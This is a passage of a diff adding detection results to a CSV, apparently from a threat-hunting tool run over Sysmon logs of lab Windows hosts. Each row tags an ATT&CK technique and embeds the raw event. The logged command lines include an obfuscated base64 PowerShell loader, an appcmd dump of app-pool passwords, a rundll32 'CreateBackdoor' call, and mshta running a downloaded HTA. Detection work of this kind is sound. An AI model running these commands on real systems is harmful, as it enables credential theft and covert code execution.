+    <Data Name=""ProcessId"">652</Data>
+    <Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.0.2.13</Data>
+    <Data Name=""SourceHostname"">IEWIN7</Data>
+    <Data Name=""SourcePort"">49159</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">10.0.2.18</Data>
+    <Data Name=""DestinationHostname""></Data>
+    <Data Name=""DestinationPort"">4443</Data>
+    <Data Name=""DestinationPortName""></Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-03T20:39:30.254733Z"">
+    </TimeCreated>
+    <EventRecordID>8352</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""112"" ThreadID=""2084"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-03 20:39:30.254</Data>
+    <Data Name=""ProcessGuid"">365ABB72-1282-5D1D-0000-0010DD401B00</Data>
+    <Data Name=""ProcessId"">2328</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-0A6F-5D1D-0000-0020CA350100</Data>
+    <Data Name=""LogonId"">0x135ca</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-1256-5D1D-0000-0010FB1A1B00</Data>
+    <Data Name=""ParentProcessId"">1632</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\notepad.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-03T20:39:30.254733Z"">
+    </TimeCreated>
+    <EventRecordID>8352</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""112"" ThreadID=""2084"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-03 20:39:30.254</Data>
+    <Data Name=""ProcessGuid"">365ABB72-1282-5D1D-0000-0010DD401B00</Data>
+    <Data Name=""ProcessId"">2328</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-0A6F-5D1D-0000-0020CA350100</Data>
+    <Data Name=""LogonId"">0x135ca</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-1256-5D1D-0000-0010FB1A1B00</Data>
+    <Data Name=""ParentProcessId"">1632</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\notepad.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-03T20:39:30.254733Z"">
+    </TimeCreated>
+    <EventRecordID>8352</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""112"" ThreadID=""2084"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-03 20:39:30.254</Data>
+    <Data Name=""ProcessGuid"">365ABB72-1282-5D1D-0000-0010DD401B00</Data>
+    <Data Name=""ProcessId"">2328</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-0A6F-5D1D-0000-0020CA350100</Data>
+    <Data Name=""LogonId"">0x135ca</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-1256-5D1D-0000-0010FB1A1B00</Data>
+    <Data Name=""ParentProcessId"">1632</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\notepad.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436009.341503,2019-07-30T01:33:29.341503+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:28.374373Z"">
+    </TimeCreated>
+    <EventRecordID>4917</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:28.222</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6628-5D3F-0000-001062788800</Data>
+    <Data Name=""ProcessId"">2040</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.202039,2019-05-27T05:29:18.202039+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:18.202039Z"">
+    </TimeCreated>
+    <EventRecordID>5916</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:18.161</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-0010CC8AFF00</Data>
+    <Data Name=""ProcessId"">2524</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool /text:processmodel.password</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.221386Z"">
+    </TimeCreated>
+    <EventRecordID>243540</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.029</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010946B2000</Data>
+    <Data Name=""ProcessId"">1828</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname (  ) , IP ( 104.20.208.21 ) and port ( 80 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T18:35:06.562199Z"">
+    </TimeCreated>
+    <EventRecordID>16794</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1880"" ThreadID=""288"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 18:35:04.463</Data>
+    <Data Name=""ProcessGuid"">365ABB72-6759-5CD8-0000-0010E2D50F00</Data>
+    <Data Name=""ProcessId"">1420</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.0.2.15</Data>
+    <Data Name=""SourceHostname"">IEWIN7..home</Data>
+    <Data Name=""SourcePort"">49165</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">104.20.208.21</Data>
+    <Data Name=""DestinationHostname""></Data>
+    <Data Name=""DestinationPort"">80</Data>
+    <Data Name=""DestinationPortName"">http</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.221386Z"">
+    </TimeCreated>
+    <EventRecordID>243540</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.029</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010946B2000</Data>
+    <Data Name=""ProcessId"">1828</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1218.005 ] Mshta found running in the system,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta&quot;) and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine (&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; C:\Users\IEUser\Downloads\update.html) in directory : ( C:\Users\IEUser\Desktop\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-06-15T07:13:42.294109Z"">
+    </TimeCreated>
+    <EventRecordID>7648</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2044"" ThreadID=""2092"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
